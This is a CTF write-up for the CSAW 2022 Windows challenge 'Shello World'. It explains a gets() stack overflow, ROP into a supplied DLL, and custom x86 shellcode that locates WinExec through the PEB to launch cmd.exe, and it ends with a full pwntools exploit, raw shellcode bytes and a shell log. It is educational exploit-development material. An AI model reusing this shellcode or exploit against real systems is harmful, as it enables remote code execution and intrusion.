Security / Writeup

CSAW 2022- Shello World Writeup

September 14, 202212 min read

Shello World

Binary Exploitation (pwn) - 471pts

Description:

Write your first Windows shellcode!

nc win.chal.csaw.io 7778

Hints:

The flag is in C:\chal\flag.txt.

Table of Contents

  1. Working with Windows
  2. Discovery
  3. Plagiarism is Still Easier
  4. Finding kernel32.dll
  5. Finding WinExec using Tables
  6. Popping a Shell
  7. Getting the Flag
  8. TL;DR

Working with Windows

This challenge gave us a .exe file, a .dll file, a Docker container, and socat (Socket Cat) portable.

Wine, for Linux, is usually a hassle and I never have good luck with it. Luckily, for development reasons, my laptop is a dualboot with Windows, so we have to go set up a pwn-ing environment real quick.

Everything is done through powershell since it feels marginally better than cmd.

I ended up using socat to run the program, so I have a process to "connect" to. It can be ran like so:

PS> ./socat.exe TCP-LISTEN:7778,reuseaddr,fork exec:./ShelloWorld.exe,pty,ctty,echo=0

From there I installed my standard tools that I use, Cutter, Python, pwntools.

Finally, I got a debugger for windows programs, I used x64dbg (specifically, x32dbg). My process was to run my exploit, pause, then attach onto the pid in x32dbg. Our skeleton pwntools script would look like:

from pwn import *
r = remote("127.0.0.1", 7778)

pause()
r.recvuntil('>')

With that all set up, we can start looking at the binary.

Discovery

Running the binary gives us a little intro about Windows, notes that it's running Windows Server 2019 LTS, and expects shellcode from us. Also, popping a shell is async, so we have to make the process idle after doing so (more on this later).

If you don't know what shellcode is, go to my Two's Compliment writeup, I'm going to make some basic assumptions about our goals here.

In this case, we're trying to call WinExec with the parameter C:\Windows\System32\cmd.exe to get a shell.

What is WinExec? It's a kernel wrapper function that lives in kernel32.dll that acts very similar to execve on linux.

Let's look at the .exe file first:

There's a few challenge hosting functions that aren't really relevant. Our main function calls RunChallenge, which prints out the intro text, then calls _Vuln:

void _Vuln(void)
{
    undefined4 uVar1;
    int32_t in_stack_fffffde8;
    char *s;
    char buf [500];
    
    // void Vuln();
    _printf((int32_t)"Okay, give me some input!\n\n> ", in_stack_fffffde8);
    uVar1 = (**(code **)0x40904c)(1);
    _fflush(uVar1);
    _gets(&s);
    _printf((int32_t)"Thanks for playing...\n", in_stack_fffffde8);
    uVar1 = (**(code **)0x40904c)(1);
    _fflush(uVar1);
    return;
}

Our friend the gets function. To double check that this works alright, I found a checksec for Windows. All important binary security features are off, we have an executable stack, no canary, no randomization that matters, and so on.

At this point, I can see that this will be a simple buffer overflow, with a bit of ROPing to our code.

Lets look at the given .dll:

We have SuspiciousGadget:

void _SuspiciousGadget(void)
{
    (*(code *)&stack0xfffffffc)();
    return;
}

and BeKindtoYourCSAWInfraTeam:


void BeKindToYourCSAWInfraTeam(void)
{
    code **ppcVar1;
    code *pcVar2;
    
    (*_Sleep)(120000);
    (*_ExitProcess)(0);
    /*
        omitted, irrelevant code
    */
}

Since there is no randomization, we can jump to these functions directly.

Basically, the start of our pwntools script will look like:

payload = b"A" * 508        # Buffer
payload += p32(0x62101627)  # sleep function
payload += p32(0x62101621)  # shellcode gadget

So the idea is that we overflow the buffer and other garbage on the stack, then put on a ROP addresses to the sleep function and our shellcode gadget, which will just return back to the stack.

Plagiarism is Still Easier

With my previous shellcode writing, it's usually easier to find someone else who did what you are trying to do and modify it. Googling Windows shellcode brings you to this writeup.

They go through explaining the call structure and the architecture of Windows system calls and APIs. It's a good read. They wrote shellcode and directly executed it in C. I'm going to go through and explain how I modified it to work in our challenge. If you want further explanation on how the kernel32.dll is found, and how we find the WinExec function, read that writeup!

Finding kernel32.dll

So apparently, with most security features off you can just find kernel32.dll without much hassle. Since we need to ROP, it's probably a good idea to follow calling conventions (saving registers, allocating stack), to avoid segfaulting and put our next return address in the right place.

We first start with some standard stack allocation/calling convention:

push eax ; Save all registers
push ebx
push ecx
push edx
push esi
push edi
push ebp


push ebp ; Establish a new stack frame
mov ebp, esp

sub esp, 18h ; alloc mem on stack

We then push the string WinExec onto the stack:

xor esi, esi
push esi			; null termination
push 0x63
pushw 0x6578
push 0x456e6957
mov [ebp-4], esp    ; var4 = "WinExec\x00"

Then, we work on finding kernel32.dll's base address. I had originally tried to just hard code it, and it worked while I attached the debugger, but didn't work on remote, and it didn't really work locally either... I had trouble with docker, so I went through all the steps that the writeup did. The advantage is, this is more or less portable for similar level shellcode chals.

; Find kernel32.dll base address
xor esi, esi			; esi = 0
mov ebx, [fs:0x30 + esi]  	; avoding null bytes
mov ebx, [ebx + 0x0C] 
mov ebx, [ebx + 0x14] 
mov ebx, [ebx]	
mov ebx, [ebx]	
mov ebx, [ebx + 0x10]		; ebx has kernel32 base addr
mov [ebp-8], ebx 		; var8 = kernel32.dll base addr

This is all good... let's move on to finding the WinExec address, by pulling up all the of the address tables that we need to iterate through kernel32.dll

Finding WinExec using Tables

	; Find WinExec address
	mov eax, [ebx + 0x3C]		; RVA of PE signature
	add eax, ebx       		; Address of PE signature = base address + RVA of PE signature
	mov eax, [eax + 0x78]		; RVA of Export Table
	add eax, ebx 			; Address of Export Table

	mov ecx, [eax + 0x24]		; RVA of Ordinal Table
	add ecx, ebx 			; Address of Ordinal Table
	mov [ebp-0x0C], ecx 		; var12 = Address of Ordinal Table

	mov edi, [eax + 0x20] 		; RVA of Name Pointer Table
	add edi, ebx 			; Address of Name Pointer Table
	mov [ebp-0x10], edi 		; var16 = Address of Name Pointer Table

	mov edx, [eax + 0x1C] 		; RVA of Address Table
	add edx, ebx 			; Address of Address Table
	mov [ebp-0x14], edx 		; var20 = Address of Address Table

	mov edx, [eax + 0x14] 		; Number of exported functions

	xor eax, eax 			; counter = 0

This is where we run into our first problem...

That 0x1C byte from mov edx, [eax + 0x1C], for whatever reason, causes gets() to not work, and our shellcode doesn't get read. I cannot explain to you the sheer amount of confusion that I had when building this. One moment it was reading the code, the next not. I know that line feeds and whatnot are off the table cause it's gets(), but this random file separator byte decides to break everything.

So I fiddle with it to avoid using that byte:

mov esi, eax
add esi, 0x20
dec esi
dec esi
dec esi
dec esi
mov edx, [esi] ; RVA of Address Table
xor esi, esi

We then loop through the address table until we find WinExec:

loop: 
    mov edi, [ebp-0x10] ; addr. of Name Ptr Table
    mov esi, [ebp-4] ; WinExec
    xor ecx, ecx

    cld  ; set DF=0 => process strings from left to right
    mov edi, [edi + eax*4]
    add edi, ebx
    add cx, 8
    repe cmpsb  ; esi and edi registers. ZF=1 if equal, ZF=0 if not
    jz found
    inc eax
    cmp eax, edx  ;check if last function reached
    jb loop
    add esp, 0x26  ; reclaim stack

Once we found WinExec, we do a bit of math to get the exact pointer:

found:
    mov ecx, [ebp-0x0C]	; ecx = var12 = Address of Ordinal Table
    mov edx, [ebp-0x14]  	; edx = var20 = Address of Address Table

    mov ax, [ecx + eax*2] 	; ax = ordinal number = var12 + (counter * 2)
    mov eax, [edx + eax*4] 	; eax = RVA of function = var20 + (ordinal * 4)
    add eax, ebx 		; eax = address of WinExec = kernel32.dll base address + RVA of WinExec

    xor edx, edx

And yet, another problem! The 0x04 bytes from the compiled mov ax,WORD PTR [ecx+eax*2] and mov eax, [edx + eax*4] don't get read by gets. It still fills the buffer unlike 0x1c, but is just absent, which screws up the shell code functionality. Again, a lot of confusion when I would SEE the code get read in properly, but then the commands get offset improperly and becomes a garbled mess.

So again, more fiddling to avoid causing those 0x04 bytes to show up:

mov esi, ecx
add esi, eax
add esi, eax
mov ax, [esi] ; ax = ordinal number = var12 + (counter * 2)
mov esi, edx
add esi, eax
add esi, eax
add esi, eax
add esi, eax
mov eax, [esi] ; eax = RVA of function = var20 + (ordinal * 4)
xor esi, esi

Popping a Shell

First, we load our parameter onto the stack:

xor edx, edx
push edx         ; null terminator
push 0x20657865
push 0x2e646d63
push 0x5c32336d
push 0x65747379
push 0x535c7377
push 0x6f646e69
push 0x575c3a43 ; "C:\Windows\System32\cmd.exe "

The writeup shellcode used calc.exe at first, which is interesting that the whole path is divisible by 8, making it a bunch of clean stack pushes. Luckily, windows doesn't give a shit, and I can just use a space (0x20) to fill... space.

(Also, remember little endian and stack structure, which is why the bytes are ordered backwards!)

Finally, we call WinExec with our parameters pushed onto the stack

mov esi, esp		; esi -> "C:\Windows\System32\cmd.exe "

push 10  		; window state SW_SHOWDEFAULT
push esi 		; "C:\Windows\System32\cmd.exe "
call eax 		; WinExec

add esp, 0x46		; clear the stack
ret

One last issue, we can't use 0x0a, cause it causes gets() to stop reading. Luckily, this is just for positioning the window. And since the person who wrote this wanted to work like normal, he used 10. I can just change this to 1.

push 0x01

So WinExec gets called with our path and SW_SHOWNORMAL window mode. Not that it matters since we're just popping a shell.

Getting the Flag

Because we reclaimed our stack, ret will return back to where our address for the sleep function is on the DLL, and return to that and cause the chal process to sleep. Since the shell is async, we need our chal to sleep, or else it will exit causing our connection to exit.

Our final exploit assembly:

push eax
push ebx
push ecx
push edx
push esi
push edi
push ebp

push ebp
mov ebp, esp
sub esp, 0x18

xor esi, esi
push esi
push 0x63
pushw 0x6578
push 0x456e6957
mov [ebp-4], esp

xor esi, esi
mov ebx, [fs:0x30 + esi]
mov ebx, [ebx + 0x0C] 
mov ebx, [ebx + 0x14] 
mov ebx, [ebx]	
mov ebx, [ebx]	
mov ebx, [ebx + 0x10]
mov [ebp-8], ebx


mov eax, [ebx + 0x3C]
add eax, ebx
mov eax, [eax + 0x78]
add eax, ebx

mov ecx, [eax + 0x24]
add ecx, ebx 
mov [ebp-0x0C], ecx

mov edi, [eax + 0x20]
add edi, ebx
mov [ebp-0x10], edi


mov esi, eax
add esi, 0x20
dec esi
dec esi
dec esi
dec esi
mov edx, [esi]
xor esi, esi
add edx, ebx
mov [ebp-0x14], edx
add eax, 0x14
dec eax
dec eax
mov edx, [eax]

xor eax, eax

loop:
    mov edi, [ebp-0x10]
    mov esi, [ebp-4]
    xor ecx, ecx

    cld 
    mov edi, [edi + eax*4]
    add edi, ebx
    add cx, 8
    repe cmpsb  
    jz found
    inc eax
    cmp eax, edx
    jb loop
    add esp, 0x26  		
found:
    mov ecx, [ebp-0x0C]
    mov edx, [ebp-0x14]
    mov esi, ecx
    add esi, eax
    add esi, eax
    mov ax, [esi]
    mov esi, edx
    add esi, eax
    add esi, eax
    add esi, eax
    add esi, eax
    mov eax, [esi]
    xor esi, esi
    add eax, ebx

xor edx, edx
push edx
push 0x20657865
push 0x2e646d63
push 0x5c32336d
push 0x65747379
push 0x535c7377
push 0x6f646e69
push 0x575c3a43
mov esi, esp
push 0x01
push esi
call eax
add esp, 0x46
ret

Our exploit script:

from pwn import *
# r = remote("127.0.0.1", 7778)
r = remote('win.chal.csaw.io', 7778)

# pause()

payload = b"A" * 508        # Buffer
payload += p32(0x62101627)  # sleep function
payload += p32(0x62101621)  # shellcode gadget
# lol
monolith = b'\x50\x53\x51\x52\x56\x57\x55\x55\x89\xE5\x83\xEC\x18\x31\xF6\x56\x6A\x63\x66\x68\x78\x65\x68\x57\x69\x6E\x45\x89\x65\xFC\x31\xF6\x64\x8B\x5E\x30\x8B\x5B\x0C\x8B\x5B\x14\x8B\x1B\x8B\x1B\x8B\x5B\x10\x89\x5D\xF8\x8B\x43\x3C\x01\xD8\x8B\x40\x78\x01\xD8\x8B\x48\x24\x01\xD9\x89\x4D\xF4\x8B\x78\x20\x01\xDF\x89\x7D\xF0\x89\xC6\x83\xC6\x20\x4E\x4E\x4E\x4E\x8B\x16\x31\xF6\x01\xDA\x89\x55\xEC\x83\xC0\x14\x48\x48\x8B\x10\x31\xC0\x8B\x7D\xF0\x8B\x75\xFC\x31\xC9\xFC\x8B\x3C\x87\x01\xDF\x66\x83\xC1\x08\xF3\xA6\x74\x08\x40\x39\xD0\x72\xE5\x83\xC4\x26\x8B\x4D\xF4\x8B\x55\xEC\x89\xCE\x01\xC6\x01\xC6\x66\x8B\x06\x89\xD6\x01\xC6\x01\xC6\x01\xC6\x01\xC6\x8B\x06\x31\xF6\x01\xD8\x31\xD2\x52\x68\x65\x78\x65\x20\x68\x63\x6D\x64\x2E\x68\x6D\x33\x32\x5C\x68\x79\x73\x74\x65\x68\x77\x73\x5C\x53\x68\x69\x6E\x64\x6F\x68\x43\x3A\x5C\x57\x89\xE6\x6A\x01\x56\xFF\xD0\x83\xC4\x46\xC3'
payload += monolith


r.recvuntil('>')
r.sendline(payload)
r.interactive()

Running it on remote gives us a shell, and we can read the flag!

[*] Switching to interactive mode
 Thanks for playing...
Microsoft Windows [Version 10.0.17763.3287]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>cd chal
cd chal

C:\chal>
C:\chal>more flag.txt
more flag.txt
flag{I_w4nt3d_t0_j01n_y0ur_T34ms_p4rty_but_1_h4d_t0_jump_t0_4n0th3r_funct10n}

C:\chal>
C:\chal>

Neat! A lot of the same principals as regular shellcode, but needs extra work to get access to our kernel level syscalls.

It was the 8th solve at the time, and so then after 6 or 7 hours of work, I submitted the flag at 6am CST and promptly went to bed.

TL;DR

Use some windows shellcode from online, adapt it for it being read rather than compiled in a C file. Place it in a exploit script and run it.

Assemblyx86Binary ExploitationShellcodeWindows